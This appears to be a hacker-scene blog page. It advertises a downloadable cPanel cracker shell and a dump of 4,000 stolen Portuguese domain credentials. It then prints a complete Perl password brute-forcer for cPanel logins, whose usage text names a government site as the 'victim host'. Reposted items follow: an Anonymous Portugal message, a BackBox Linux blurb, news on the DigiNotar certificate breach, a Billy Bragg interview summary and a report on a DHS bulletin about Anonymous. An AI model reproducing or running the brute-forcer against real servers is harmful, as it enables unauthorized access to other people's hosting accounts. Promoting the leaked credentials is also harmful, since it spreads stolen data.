PTIN cPanel Cracker v 1.0 Shell

Download from here..
—————————–

Click to Download

Shad0wTeam Dump 4000 Portuguese Domain Credentials

All Data Released Soon

Cpanel Password Brute Forcer

#!/usr/bin/perl
# Cpanel Password Brute Forcer
# ———Coded (r@zy 3xpl0!t——————-
use IO::Socket;
use LWP::Simple;
use MIME::Base64;

$host = $ARGV[0];
$user = $ARGV[1];
$port = $ARGV[2];
$list = $ARGV[3];
$file = $ARGV[4];
$url = “http://”.$host.”:”.$port;
if(@ARGV < 3){
print q(
################################################## #############
# Cpanel Password Brute Force Tool #
################################################## #############
# usage : cpanel.pl [HOST] [User] [PORT][list] [File] #
#————————————————————-#
# [Host] : victim Host (pak.gov.pk) #
# [User] : User Name (demo) #
# [PORT] : Port of Cpanel (2082) #
#[list] : File Of password list (list.txt) #
# [File] : file for save password (password.txt) #
# #
################################################## #############
# Coded (r@zy 3xpl0!t——————-
################################################## #############
);exit;}

headx();

$numstart = “-1″;

sub headx() {
print q(
################################################## #############
# Cpanel Password Brute Force Tool #
# Coded (r@zy 3xpl0!t——————-
################################################## #############
);
open (PASSFILE, “<$list”) || die “[-] Can’t open the List of password file !”;
@PASSWORDS = <PASSFILE>;
close PASSFILE;
foreach my $P (@PASSWORDS) {
chomp $P;
$passwd = $P;
print “
[~] Try Password : $passwd
“;
&brut;
};
}
sub brut() {
$authx = encode_base64($user.”:”.$passwd);
print $authx;
my $sock = IO::Socket::INET->new(Proto => “tcp”,PeerAddr => “$host”, PeerPort => “$port”) || print “
[-] Can not connect to the host”;
print $sock “GET / HTTP/1.1
“;
print $sock “Authorization: Basic $authx
“;
print $sock “Connection: Close

“;
read $sock, $answer, 128;
close($sock);

if ($answer =~ /Moved/) {
print “
[~] PASSWORD FOUND : $passwd
“;
exit();
}
}

Anonymous – Message To Portuguese Government And All Portuguese

Operation Portugal – Anti-Fascism

Anonymous Portugal

BackBox Linux

BackBox is an Ubuntu-based distribution developed to perform penetration tests and security assessments.

It is designed to be fast and easy to use.

It provides a minimal yet complete desktop environment, thanks to its own software repositories, which are always updated to the latest stable versions of the most often used and best-known ethical hacking tools.

Source

Iran involvement suspected in high-end hack attack

 

Hackers who broke into a Dutch web security firm have issued hundreds of bogus security certificates for spy agency websites including the CIA as well as for internet giants like Google, Microsoft and Twitter, the US government said.

 

Experts say they suspect the hacker – or hackers – operated with the cooperation of the Iranian government.

 

So far, only a handful of users in Iran are known to have been affected. In addition, the latest versions of browsers such as Microsoft’s Internet Explorer, Google’s Chrome and Mozilla’s Firefox are now rejecting certificates issued by the firm that was hacked, DigiNotar.

 

But in a statement on Monday, local time, the Dutch Justice Ministry published a list of the fraudulent certificates that greatly expands the scope of the July hacking attack that DigiNotar first acknowledged last week.

 

The list includes sites operated by Yahoo, Facebook, Microsoft, Google, Skype, AOL, Mozilla, TorProject, and WordPress, as well as spy agencies including the CIA, Israel’s Mossad and Britain’s MI6.

DigiNotar is one of many companies which sell the security certificates widely used to authenticate websites and guarantee that communications between a user’s browser and a website are secure.

In theory, a fraudulent certificate can be used to trick a user into visiting a fake version of a website, or used to monitor communications with the real sites without users noticing.

But in order to pass off a fake certificate, a hacker must be able to steer his target’s internet traffic through a server he controls. That’s something that only an internet service provider can easily do – or a government that commands one.

Technology experts cite a number of reasons to believe the hacker – or hackers – were based in Iran and cooperated with the Iranian government, perhaps in attempts to spy on dissidents. Notably, several of the certificates contain nationalist slogans in the Farsi language.

“This, in combination with messages the hacker left behind on DigiNotar’s website, definitely suggests that Iran was involved,” said Ot van Daalen, director of Bits of Freedom, an online civil liberties group.

The hack of DigiNotar closely resembles one in March of the US security firm Comodo Inc., which was also attributed to an Iranian hacker.

Gervase Markham, a Mozilla developer who has been involved in the response to the DigiNotar failure, warned Iranian internet users to update their browsers, “log out of and back into every email and social media service you have” and change all passwords.

Van Daalen said he believed the DigiNotar incident will ultimately lead to a reform of authentication technology.

Although no users in the Netherlands are known to have been victimized directly by the hack, it has caused a major headache for the Dutch government, which relied on DigiNotar for authentication of most of its websites.

In a pre-dawn press conference on Saturday, Justice Minister Piet Hein Donner said the safety of websites including the country’s social security agency, police and tax authorities could no longer be guaranteed.

He advised users who wanted to be certain of secure communication with the government to return to using pen and paper.

The Dutch government took over management of DigiNotar, a subsidiary of Chicago-based Vasco Inc., but kept the websites operating as it scrambles to find replacement security providers.

 

 

Source 

British Rocker Billy Bragg on Labor Strikes and Songs, Activism, and the Murdoch Hacking Scandal

We spend the hour with legendary British rocker and activist, Billy Bragg.

His music career began in the late 1970s in London when he formed the punk rock band Riff Raff. His 1984 album, “Brewing Up with Billy Bragg,” included the song “It Says Here,” a critique of politics and tabloid newspapers that still rings true today in the wake of the News of the World phone-hacking scandal.

In 1998 and 2000, he participated in two well-known albums — Mermaid Avenue, Volumes 1 and 2 — that gave voice to another folk troubadour who sang about the poor and working class: Woody Guthrie.

Bragg composed music for lyrics written by Guthrie and performed many of the songs alongside the album’s other main contributor, Wilco.

But to speak of Bragg simply as a singer-songwriter misses his passion for speaking out against injustice and fighting for many causes. In the 1980s, he called for support for the 1984 strike by the National Union of Mineworkers, one of the most significant chapters in Britain’s trade union history.

It was ultimately defeated under the watch of then-Prime Minister Margaret Thatcher, and Bragg went on to organize for the defeat of Thatcher and her Conservative government.

He joins us for an extended interview and performance.

He reflects on his long history of activism and sings several songs, including his latest, “Never Buy The Sun,” about the phone-hacking scandal engulfing the Rupert Murdoch media empire. [includes rush transcript]

Source

DHS warns about coming @Anonymous attacks

The United States Department of Homeland Security warned the security community about potential attacks from hacking collective Anonymous over the next few months.
The Sept. 2 security bulletin from the DHS National Cyber-Security and Communications Integration Center warned financial services companies to be on the lookout for attackers operating under the Anonymous umbrella to “solicit ideologically dissatisfied, sympathetic employees” to the cause.
The collective recently took to Twitter to persuade employees within the financial sector to hand over information and access to enterprise networks. Though such attempts may have been unsuccessful so far, “unwilling coercion through embarrassment or blackmail may be a risk to personnel,” the DHS bulletin warned.
DHS issued the bulletin primarily for cyber-security professionals and staff in charge of protecting critical infrastructure. The bulletin also refer to new tools that Anonymous may be using in launching future attacks. Anonymous has been primarily using the Low Orbit Ion Cannon, a fairly simple testing software that can ping a server repeatedly, to launch its distributed denial of service attacks. Some of the members have been working on a new DDoS tool, based on JavaScript, dubbed #RefRef.
The new attack tool is said to be capable of using the server’s own resources and processing power to launch a denial of service attack against itself, but “so far it’s unclear what the true capabilities of #RefRef are,” the DHS said in the bulletin. The tool is slated to be released Sept. 17.
DHS also referenced the “Apache Killer” Perl script that can be used to launch denial of service attacks against Web servers running the popular Apache software. Apache developers released a patch earlier this week to fix the vulnerability in Apache 2.2. Administrators have been urged to patch their servers immediately.
The DHS also mentioned three cyber-attacks and civil protests Anonymous has already announced. “Occupy Wall Street” is the first scheduled one, for Sept. 17. Announced by a group Adbusters in July and actively supported by Anonymous, the goal is to get 20,000 individuals to gather on Wall Street to protest various U.S. government policies. Similar rallies targeting financial districts are being planned in Madrid, Milan, London, Paris and San Francisco.
Another protest in October, also led by Adbusters, is scheduled to be held at the Washington, D.C. National Mall to mark the 10th anniversary of the war in Afghanistan. There is also the supposed Nov. 11 attack against Facebook and Project Mayhem, scheduled for Dec. 21, 2012, DHS warned. There are indications that Project Mayhem would be a combination of physical disruption and targeting of information systems.
The bulletin itself is unusual in that DHS hasn’t commented on the activities of Anonymous ever since the group stepped up its efforts over the past few months, attacking federal agencies and private corporations to protest a wide range of issues. As anyone following the security space undoubtedly knows, there have been at least one or two attacks by Anonymous, even more, each week for the past few months, so the bulletin may be just stating the obvious when warning of future potential attacks.
“Anonymous has shown through recently reported incidents that it has members who have relatively more advanced technical capabilities who can also marshal large numbers of willing, but less technical, participants for DDOS activities,” the DHS said.

(Source: eWeek)

Follow

Get every new post delivered to your Inbox.